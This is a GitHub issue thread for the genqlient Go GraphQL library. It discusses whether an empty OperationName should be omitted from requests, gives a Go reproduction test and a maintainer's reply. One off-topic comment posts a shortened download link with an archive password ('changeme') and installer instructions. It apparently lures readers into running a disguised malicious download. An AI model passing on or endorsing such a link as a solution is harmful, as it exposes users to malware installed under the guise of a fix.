### ISSUE TITLE
Empty OperationName should not be coerced to “” (but null)

### ISSUE THREAD

**Issue by marclllaks** [Khan/genqlient#351]
**Describe the bug**
When the OperationName is not provided, it is always coerced to an empty string. However, according to the specification, this behaviour doesn't seem to be compliant: https://spec.graphql.org/draft/#sec-Executing-Requests
Some GraphQL servers seem to be tolerant, but the Express implementation for example returns a status code 400.

**To Reproduce**
This code snippet sends a simple GraphQL query to a server running the Express implementation.
```go
func TestGraphql(t *testing.T) {
	ctx := context.Background()
	client := graphql.NewClient("https://easscan.org/graphql", http.DefaultClient)

	requestContainer := graphql.Request{
		Query: "query { timestamps { from }}",
	}

	var response interface{}

	responseContainer := graphql.Response{
		Data: &response,
	}

	err := client.MakeRequest(ctx, &requestContainer, &responseContainer)
	if err != nil {
		fmt.Println("error:", err)
	}

	fmt.Println("response", response)
}
```

**Expected behavior**
If no OpName is specified it should be omitted from the request.

**genqlient version**
v0.7.0

**Additional context**
I've looked at other GraphQL clients like Apollo or Postman, and they seem to omit OperationName when it's not specified.
A shoutout to @flovilmart who seemed to have found this issue before: https://github.com/graphql-go/graphql/issues/616

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by marclllaks** [comment]
Tried to open a PR with my solution but did not have access, so here is how we patched it.
https://github.com/guildxyz/genqlient

(Not sure if it alters any other behaviour, for our purpose it works.)

**Comment by benjaminjkraft** [comment]
genqlient requires operation names -- queries without are rejected here:
https://github.com/Khan/genqlient/blob/4466fc10e4f306ebe5f7e0e8301cd576744ac7ee/generate/generate.go#L236

If you're looking to manually write your own queries and structs, and not use the genqlient code generation (which based on your example is what I infer), our client probably isn't the one for you! I think [shurcooL's](https://github.com/shurcooL/graphql) is the standard for such usages.
